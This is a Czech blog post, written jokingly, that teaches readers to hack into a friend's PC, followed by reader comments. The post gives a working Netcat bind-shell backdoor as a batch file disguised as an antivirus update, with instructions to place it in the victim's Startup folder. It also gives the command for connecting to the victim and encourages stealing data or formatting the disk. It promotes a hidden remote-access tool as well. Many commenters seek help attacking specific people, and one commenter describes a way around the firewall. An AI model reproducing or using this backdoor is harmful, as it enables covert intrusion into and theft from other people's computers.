Upozornění na nový obsah pomocí RSS.
Upozornění na nový obsah pomocí e-mailu.
Chcete se nabourat do počítače kamarádovi? Žádný problém!
To opravdu není žádný problém. Chcete to naučit? Přečtěte si článek ... kdo ví, možná z vás bude velký h4xor.
edit: Z odkazu na konci článku byl udělán hypertext.
Má to ale háčkek .... teda háčky:
- Obět nesmí mít zaplej firewall
- Oběť musí mít veřejnou IP adresu (tedy pokud útočíte ze sítě internet)
- Musíte nějakým způsobem dostat do PC oběti jeden soubor
- Oběť musí být přinejmenším slepá jak patrona (bod 4 neplatí v případě mého h4xor toolkitu, který vám nabídnu nakonci)
Na to, že vůbec žádnej h4xor nejsem je těch háčků docela málo ne?
Tak a dáme se do toho ...
Co k tomu potřebujete:
- 0. Základní znalost práce s příkazovou řádkou (cd, format c:, del, rm, hack_all, fuckoff)
- 1. Program NetCat ... nc.exe (nakonci hodim link)
- 2. Počítač na bázi intel x86 (ano, váš počítač je k tomu vhodný i pokud máte amd)
- 3. min 1MB místa na pevném disku
- 4. min 4MB operační paměti
- 5. jídlo a pití (nejlépe kofolu, párky od Antoniho a čerstvý rohlík)
- 6. samozřejmě přípojku k nějaké síti, přes kterou chcete útok provést (intranet,internet)
- 7. měkkou židli, pokud možno na kolečkách nebo hydraulickou z autobusu
- 8. únikovou trasu, v případě návštvěvy federálů
Tyhle věci potřebujete naprosto nutně. Když nemáte, nemůžete hekovat.
Náš útok se bude skládat z cmd scriptu, který vy dostanete do PC oběti a z CMD scriptu, který nám umožní pronikout do PC oběti.
Co je to cmd script? To je dávkový soubor, to samé jako soubor BAT (nebudu vám říkat co je to dávkový soubor, říkal jsem vám snad jasně, že potřebujete základní znalost příkazové řádky.)
Backdoor
backdoor je script, který dostanete do PC oběti. K tomuto scriptu samozřejmě připojíte i program NetCat čili nc.exe, který je nezbytný pro běh skriptu:
- 1. Vytvořte si složku, kam budete svoje heky ukládat
- 2. Pokud to ještě nemáte (jestli ne, nejte pořádný hacker ale lamer), zapněte si zobrazování známých přípon souborů.
- 3. Vytvořte texťák a přejmenujte ho na aktualizace.cmd (nebudeme ho přece nazývat backdoor_DONT_THE_FUCK_TOUCH_THIS_it_is_deadly_hackers_work.cmd).
- 4. Do této složky nakopírujte nc.exe
- 5. Editujte skript takto:
@echo off
cls
:REPLY
echo Aktualizuji váš antivirový program ... čekejte prosím
nc -v -l -p 10001 -e cmd.exe
GOTO REPLY
pause
echo off zajistí aby příkazová řádka nezobrazovala připomínky
cls vymaže obrazovku
echo uvede uživatele v domění, že se mu aktualizuje antivirový program
nc -v -l -p 10001 -e cmd.exe spustí naslouchání na portu 10001 a v případě příchozího toku na tomto portu, předá řízení příkazové řádky čili cmd.exe
pokud se útočník odpojí, bude program naslouchat znova díky nekonečné smyčce.
(představte si že uživatel zapnul PC a protože jste tento skript i s nc.exe nakopíroval do jeho složky 'Po Spuštění', má teď tento skript aktivní)
Mezitím vy:
si připravíte párky a rohlíky a napijete se kofoly.
připravíte si svůj skipt, kterým se napojíte na poslouchající backdoor:
nc -v -n IP_ADRESA_OBETI 10001
IP_ADRESA_OBETI tam samozrejme nepiste, ale napiste tam IP adredu oběti
!!! Spusťte to !!!
Ha, pokud se to povedlo, máte teď v okně příkazové řádky, příkazovou řádku oběti.
HAHAHAHAHAHA
ááááááááá cha cha chááá
muhehehehehe.
teď si můžete s jeho PC dělat co chcete, třeba krást data, formatovat disk ... muhehehe.
---------------------------
---------------------------
Sami jste si asi všimli, že je to trochu nápadné, proto jsem speciálně pro vás naprogramoval prográmek, který bude na pc oběti běžet skrytý a vy nemusíte nic psát. Tady je článek:
[http://mfs-hq.ic.cz/article/xsvr.html]
HAVE FUN PAL !!!
16.07 /2006 - 18:18 
Michal Frdlík, programování 
42 komentářů (přečteno: 36612x)
Související články:
- 11.12 /2009 - 22:40 - TCP robot Karel
- 11.10 /2009 - 13:21 - Semestrální práce v C++ Jaké téma zvolit?
- 10.09 /2009 - 14:12 - Algorithms (Battleships či Lodě): semestrální práce na ČVUT: FEL: STM
- 27.01 /2009 - 21:55 - Nejčastější výskyt nejdelšího řetězce – LRS
- 20.09 /2008 - 17:49 - GEOrss - najděte zdroje ve svém okolí
Nenechte si ujít
Nejčtenější články za poslední půlrok.
- Bylo nás pět a byli jsme v Thajsku během povodní 2011
(přečteno 862x | komentováno: 2x)
Nejkomentovanější články za poslední půlrok.
- Bylo nás pět a byli jsme v Thajsku během povodní 2011
(přečteno 862x | komentováno: 2x)
Nejčastěji komentující čtenáři za poslední půlrok.
- Veronika (3)
- Václav (2)
- MArtin (2)
- Vlak (2)
- ffhj (2)
Výběr zajímavých stránek.
delicious (profil)
blogy
- Weblog Tomáše Kápla / ČVUT FEL
- Alenčin Bložínek / ČVUT FEL
- Co de asi ? / ČVUT FEL
- Weblog Michala Frdlíka / JČU PF
- Noční pták
- Weblog Petra Mika / ZČU FAV
v angličtině
Nejkvalitnější komentář
Mach37
Tj jednoduchy když ma mit obět vyplej firewall tak to mužeš rovnou dat do toho skriptu aktulizace.cmd =) 
Jaký je váš postoj k dlouhým článkům (na internetu)?
Dlouhé články nemám rád(a). Cokoliv má více jak 140 znaků, je moc.
Neutrální. Pokud se jedná o trochu zajímavé téma, přečtu si jej se stejnou šancí jako krátký.
Nerad(a) je vidím. Téma mě musí hodně zajímat, abych si článěk přečetl(a) celý.
Už si ani nepamatuji, kdy jsem naposled přečetl(a) celý dlouhý člának.
Zaujal vás tento článek? Nezapomeňte, že je ve vaší moci ukázat stovkám dalších lidí, že tento článek se vám libí. Stačí kliknout na následující tlačítko.
Chcete být upozorňován(a) na nové texty? Pak si přidejte do své RSS čtečky zdroj pro články, bleskovy nebo komentáře a buďte tak informování o všem novém.
Neváhejte napsat k článku komentář (Co je to komentář ?), pokud máte k danému tématu co říci.
Těžko, protože se musí nějakým způsobem navázat spojení a když nemáš IP adresu stroje s kterým se chceš spojit tak to jde těžko. Dá se udělat tak, že se spojení naváže přes IP adresu útočníka, ale každopádně musí být alespoň jeden bod, přes kterej to spojení proběhne. Možná ti pomůže tenhle článek - http://leviathan.xf.cz/?p=52 . Mimochodem tenhle článek napsal právě autor blogu na kterej odkazuju, ještě v době kdy tohle byl veřejnej blog, budu to sem muset připsat. 
- Na komentář odpověděl(a) Standa v komentáři #13
czZdar plz autor muze mi dat Icq bo neco ? mam s tim programem netcat problemy mi icq je 33970409 diq a skype marekparek6853 
Zdarvim potreboval bych kontakt na cloveka ktery se uz timto zpusobem dostal nekomu do pc prosim je to nutne!odepiste na e-email!!
To se musím dostat přímo k počítači oběťi???
A ta IP musí být prostě veřejná??????
Pls.odepište mi na mail.Moc díky!!!
Robert
Cooool Joke. Co takhle nechat u "obeti" vyveseny sluchatko telefonu, muzes ho pak sqele odposlouchavat, a kdyz ti necha odemceny a otevreny barak a sejf, a vypne alarm a vyvesi vlajku "nejsem doma" az budou vsichni pryc, muzu ho snadno vykract 
Tj jednoduchy když ma mit obět vyplej firewall tak to mužeš rovnou dat do toho skriptu aktulizace.cmd =)
- Na komentář odpověděl(a) Andy v komentáři #12
ahoj je to fak hustý napiš my prosím na email olihne.0@seznam.cz
- Tento komentář je reakcí na příspěvek #5, který napsal(a) Antonín Daněk
je to lehky pokud ahckuješ vrze starší než Windows 2000 pač nemaj Windows Firewall(ale znate lidi 60%čechů používá XP...) tak sem se připojil ze normal XP Prof na VMWare virtulani masinu s Windows 2000 Prof EN...a frčelo to supa! ale škoda že ten program dole v članku nejde nastavit jako ten co hackuje u Win 2000 piše to nejakej error s registrama že to musim smazat rčuně...až na to že to tam chci přidat xD...
Jinak cool navod a je to lehký akorat HODNĚ napadny programek taky cool ;)
Ahojki prosímtě tohle je všechno hrozně fajn přesně tohle jsem potřebovala najít ale jak mám zjistit tu IP adresu nemůžu mu jentak napsat dej mi tvoji IP adresu 
prosím poradíš mi nějak ? moc díky napiš prosím na e-mail jinak e-mail majushina@gmail.com 
Tak si udělej skript třeba v php a řekni mu: koukni na muj skvelej skript a rekni mi co tam vidiš potřebuju vyzkoušet jestli to funguje
Ahoj,chci se zeptat.
Je hezky popsanej ten podrobnější odkaz,ale já mam takovej problém. Nemůžu se dostat do pc oběti. Nešlo by to nějak udělat,jako z mýho pc se nabourat do toho druhýho pc? hrozně moc by mi to pomohlo,sem v blbej situaci a potřeboval bych s něčím pomoct. Prosím odepište mi. Děkuju.
mno sem někde slyšel že u nějakejch modemu když ho resetuješ tak se IP adresa změní takže to je docela .......v sedince
- Tento komentář je reakcí na příspěvek #16, který napsal(a) Maja
Start - spustit - zadej CMD, enter, zadej ping server.cz (místo server.cz dej adresu webu), vyhodí ti to odesílám požadavek na IP xxx.xxx.xxx.xxx :-) pak dej zadej exit, enter a jsi zpět. Jen si nejsem jist, jestli to vyhodí reálnou adresu IP toho webu nebo bodu přes kterej se připojuješ...
- Na komentář odpověděl(a) ffhj v komentáři #35
- Tento komentář je reakcí na příspěvek #16, který napsal(a) Maja
Musíš stejně být u pc oběti tudíž jestli má zaplý firewall tak dáš jednoduše ten port 10001 do vyjímek a je to :-) osobně zkoušeno na několika pc
- Tento komentář je reakcí na příspěvek #12, který napsal(a) Andy
Dobry den, chtel bych se zeptat, kdyz se mi takhle nekdo dostal do PC jak se toho muzu zbavit... teda jestli je nejaky zpusob.
chtěl bych radu prosim moje icq je 412-559-155 spěchá děkuji :)
- Tento komentář je reakcí na příspěvek #3, který napsal(a) Touny
Dobrý den, mohu se vás prosím zeptat jakým příkazem si budu moci něco zkopírovat z počítače oběti do svého pc? předem děkuji..jedná se o program XSVR
:( Prosim pomoste mi někdo, mě to nejde napište prosím na email - jirihood@gmail.com
PROSÍÍM
fine tak tohle pochybuji že to dam selhala jsem už u slova firewall no jo ještě se musim hodně hodně učit :-)
zdravim nasel by se tu nekdo kdo by byl ochotny zaucit lamera kdyztak 461116714 byl bych rad kdyby jste se ozval nekdo dekuju
prosím autora jestli by mě nemoh poslat na meil petreis13@seznam.cz odkazy na:netcat,XSVR a backdoor.Rovnou děkuji
Typuju ze většina z vás ešte nedokoncili ani zakladku co ? :D .. takže naprosti BFU ;) .. otázka typu: jestli jdou ty data kopírovat apod.. to je asi Jasne ze jdou, pomocí tech základních cmd příkazů(move,rmdir,mkdir,copy,cd.....)... A tento návod je spíše pro pobavení ne ? To není myšleno vážně zejo ?.. a jako když sem si přečetl ze se někdo zasekl u slova firewall :DD ... To už je moc..
:DD cos to napsal za kravinu ? .. znas příkaz ping a víš ze to vypíše neakou IP .. tak tu machrujes před naprostými BFU ?? :) ... Ping ti vypíše odezvu ze serveru a k tomu IP to je pravda, ale nechápu jak pomocí toho zjistis IP souseda ..?? Kdyby měl web a spravoval Ho od sebe z PC, tak to poznas s příkazem ping, ale to jedině .. prostě si napsal úplnou hovadinu ;D ....
- Tento komentář je reakcí na příspěvek #20, který napsal(a) Sajrajt
poprosil bych nějakého skušeného hackra jestli by mě nezaučil a neporadil mi co mám dělat ... můj skype matej.hrach dekuji
- Na komentář odpověděl(a) Vlak v komentáři #41
Zdravím.souborXSVR-zajimalo by mě,zda ta obět když sedí u PC bude vidět,že jí otvírám třeba SKYPE atd.nebo cokoliv jiného.Děkuji
Matej Hrach chce učit Hackování. Jasně nepiš si zde ještě meno vole
- Tento komentář je reakcí na příspěvek #38, který napsal(a) hovado
ahoj mam problem kterej už tady byl řečenej ale nevyřešenej program je v pc obeti a když dám config u sebe zobrazí se INFO potom XSVR SERVER... zadám port,terminal a napíše "you must delete registry key manualy in regedit. location: HKEY_CURENT_USER\Software\microsoft\windows\currentversion\run\xsvr.exe" ale když se podívam do registru tak tam je akorát microtorrent a daemontools dokonce jsem odtumtud smazal CTFMON.exe i ze system32 ale do torentu a daemonu se mi nechce .... prosím o radu